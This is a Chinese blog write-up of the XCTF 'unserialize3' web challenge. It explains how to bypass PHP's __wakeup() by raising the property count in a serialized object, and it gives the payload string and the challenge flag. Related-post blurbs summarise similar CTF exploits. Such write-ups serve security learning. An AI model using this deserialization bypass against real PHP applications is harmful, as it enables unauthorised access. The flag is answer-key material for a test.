攻防世界-unserialize3详解

最新推荐文章于 2025-07-05 11:23:21 发布

原创最新推荐文章于 2025-07-05 11:23:21 发布 · 7.1k 阅读

15 ·

CC 4.0 BY-SA版权

文章标签：

#安全

攻防世界web高手进阶同时被 2 个专栏收录

13 篇文章

订阅专栏

unserialize3

1 篇文章

订阅专栏

unserialize3

查看源代码：

class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=

这是一个利用反序列字符串来进行绕过的题，根据提示我们要构造code参数，但是需要绕过wakeup函数

**__wakeup()**是PHP的一个魔法函数，在进行unserialize反序列化的时候，首先查看有无该函数有的话
就会先执行他
绕过：
可以通过增加对象的属性个数来进行绕过

根据源码编辑php脚本输出序列化字符串：

<?php
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
}
$c = new xctf();
print(serialize($c));

?>

在这里插入图片描述
将对象属性由1变为2得到：

O:4:"xctf":2:{s:4:"flag";s:3:"111";}

payload：

?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}

在这里插入图片描述
flag：
cyberpeace{79352c035adfa003c5b15c94b88c6c67}

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Mr H

关注关注

8
点赞
踩
15

收藏

觉得还不错? 一键收藏
2
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

攻防世界： WEB——unserialize3

Zeker62的博客

08-23

442

靶场内容题目：反序列化——说明和反序列化有关打开靶场：PHP代码——PHP反序列化 solution 这个靶场出来之后，显示出来是一个不完整的PHP代码——括号都没有完全闭合开始分析： __wakeup()属于魔术方法，通常用于反序列化中。 unserialize() 反序列化函数会检查是否存在一个 __wakeup() 方法。如果存在，则会先调用 __wakeup 方法，预先准备对...

攻防世界 unserialize3

weixin_52268949的博客

01-28

1538

unserialize3 class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } } ?code= 进入题目给出部分代码，注意发现到有个wakeup()函数，我们要想办法绕过这个函数，wakeup()有个执行漏洞:一个字符串或对象被序列化后，如果其属性被修改，则不会执行wakeup()函数，这也算是一个绕过点我们编写exp class xctf { public $flag = '

2 条评论您还未登录，请先登录后发表或查看评论

2 条评论

秃头选拔赛形象大使 2022.03.13
请问一下为什么对象要变成2
- 乙骨忧太_回复秃头选拔赛形象大使 2022.10.27
  绕过wakeup

攻防世界-unserialize3

最新发布

weixin_65725423的博客

07-05

294

摘要：本文通过分析PHP反序列化漏洞利用过程，发现当类属性数量与实际不符时可绕过__wakeup()方法。实验中使用xctf类（包含flag属性和__wakeup方法），通过修改序列化字符串中的属性数量从1改为2，成功触发漏洞获取flag。关键点在于利用反序列化时属性计数不匹配的特性，使__wakeup方法失效，从而避免程序异常退出。（98字）

攻防世界--unserialize3 fileinclude

tzyyyyyy的博客

02-06

868

攻防世界--unserialize3 fileinclude

攻防世界-unseping

m0_49025459的博客

12-17

3095

通过分析上面的代码我们可以得出，我们只要控制ctf这个参数的输入的值，就可以达成命令执行的效果，但是上面的代码，我们需要两个参数ping和后面命令执行的值，我们首先就得看看当前目录下都有些什么东西。我们看见 flag_1s_here目录下有一个flag_831b69012c67b35f.php，我们猜想运行这个php或者将它拿出来就可以获得flag，我们访问了该路径发现是空白的无法执行，那我们就用cat命令将这个php读取出来，我们可以使用三中命令读取。打开就是PHP源码，我们对源码进行分析。

【攻防世界】 Web_php_unserialize writeup

GZWZ_的博客

04-19

1469

PHP反序列化，_wakeup()绕过

攻防世界题目练习——Web引导模式（二）

qq_48550824的博客

10-12

1184

看源码可以知道，__wakeup()函数会强制将文件名转为index.php，因此我们需要绕过__wakeup()函数，接下来执行的__destruct()函数会输出对应文件的内容，我们需要让文件名显示为我们要查看的文件。的时候的结果，也就是说，这个网页在查询数据库时，应该是默认的查询的表名为"words"，查询的列名为"id"，所以我们把flag所在的表名改成words，列名改成id，就可以在网页查询1时获得flag。，1后面的单引号是多余的，因此触发报错，就可以判断我们输入的参数就是单引号闭合的形式。

攻防世界-web-ics-05

wuh2333的博客

07-12

637

攻防世界，ics，命令注入

攻防世界unserialize3

m0_73303597的博客

11-06

2289

好难啊

【攻防世界】unserialize3

m0_74979597的博客

07-12

3367

序列化和反序列化是将数据结构或对象转换为可存储或传输的格式，以便在需要时可以重新创建它们的过程。序列化将数据结构或对象转换为字节流或字符串，而反序列化将字节流或字符串转换回原始数据结构或对象。在计算机科学中，序列化和反序列化是非常重要的概念，因为它们允许我们在不同的应用程序之间共享数据。例如，当我们将数据从一个应用程序发送到另一个应用程序时，我们需要将数据序列化为可传输的格式，然后在另一个应用程序中反序列化它以将其还原为原始数据结构或对象。

攻防世界之unserialize3

qq_44111753的博客

11-17

304

题目： WP: 新知识： serialize：序列化函数，将对象转化为可保存可传输的字符串 unserialize：反序列化，将字符串转为原来的对象 <?php $a = array('a' => 'Apple' ,'b' => 'banana' , 'c' => 'Coconut'); //序列化数组 $s = serialize($a); echo $s; //输出结果：a:3:{s:1:"a";s:5:"Apple";s:1:"b";s:6:"banana";s:1:"c"

攻防世界(WEB)——unserialize3

NanGuai的博客

09-19

751

与大部分面向对象的语言类似，PHP在使用完一个对象后会将其销毁。当下某个页面要使用同一个对象时，为了避免出现找不到该对象的窘况，需要有一种方法能够将对象保存下来。以下是题目中给出的PHP代码，可以看到代码有缺失。此外，代码中还提示了我们有可能需要将已经序列化的参数传递给code变量。执行，需要使反序列失败。因此需要在不更改序列化值格式的前提下对其作出修改，然后传给。因为没有给出描述，但是根据题目可以看出来这道与。我们尝试将它补全并打印出对象的序列化值。这里我们先搞清楚什么是反序列化。

攻防世界WEB---unserialize3

Red Rapefruit

07-23

1144

攻防世界WEB—unserialize3 本文仅记录我自己的学习过程 unserialize3 题目: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 给出的是一个代码块页面,而且还是不完整的,在这里我们可以得到两部分内容:1.一个xctf的类;2.要返回一个code参数,还有题目提示的反序列化函数unserialize().既然是反序列化,那么code传入很有可能x

攻防世界web---unserialize3

m0_72447684的博客

10-10

347

攻防世界web---unserialize3

【攻防世界-web】unserialize3

weixin_73625393的博客

10-27

949

unserialize()反序列化函数会检查是否存在一个_wakeup()方法。//输出被序列化的对象（a）public function __wakeup(){ //定义公有的类的方法_wakeup()题目中的代码目前没有看见序列化函数，因此传递参数需要自己传递已经序列化的参数，题目中已经提示，传参到code。O::“”::{S:…根据代码审计，构造出来序列化序列后，不能给_wakeup()执行，否则会返回bad request。

攻防世界Web unserialize3

hhh

05-07

1397

unserialize3 啊啊啊啊好累不想写题解 ------------------------------------------------------------------------------------------------正经的分割线主要考查了反序列化中的__wakeup函数的漏洞：一个字符串或对象被序列化后，如果其属性被修改，则不会执行__wakeup()函数，可...

攻防世界——web——unserialize3（反序列化）

m0_75007575的博客

04-05

2127

一、序列化将对象的状态信息转换为可以存储或传输的形式的过程，简单来说，就是将对象转化为字节序列的过程二、反序列把字节序列恢复为对象的过程称为对象反序列